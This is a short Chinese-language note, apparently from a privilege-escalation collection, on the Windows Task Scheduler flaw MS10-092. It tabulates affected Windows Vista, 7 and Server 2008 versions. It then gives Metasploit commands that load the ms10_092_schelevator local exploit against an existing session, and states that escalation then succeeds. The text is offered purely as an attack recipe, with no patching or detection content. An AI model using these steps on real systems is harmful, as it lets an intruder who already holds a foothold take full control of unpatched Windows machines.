Windows Task Scheduler无法正确确定计划任务的安全上下文,这使本地用户可以通过精心设计的应用程序获取特权
| Product | CPU Architecture | Version | Update | Tested |
|---|---|---|---|---|
| Windows 7 | ||||
| Windows Server 2008 | SP2 | ✔ | ||
| Windows Server 2008 | ||||
| Windows Server 2008 | R2 | |||
| Windows Vista | SP1 | |||
| Windows Vista | SP2 |
测试系统 Windows Server 2008 SP2 x86,利用msf执行如下命令即可,x64版本msf不支持
use exploit/windows/local/ms10_092_schelevator
set SESSION 2
run
然后就能提权成功了
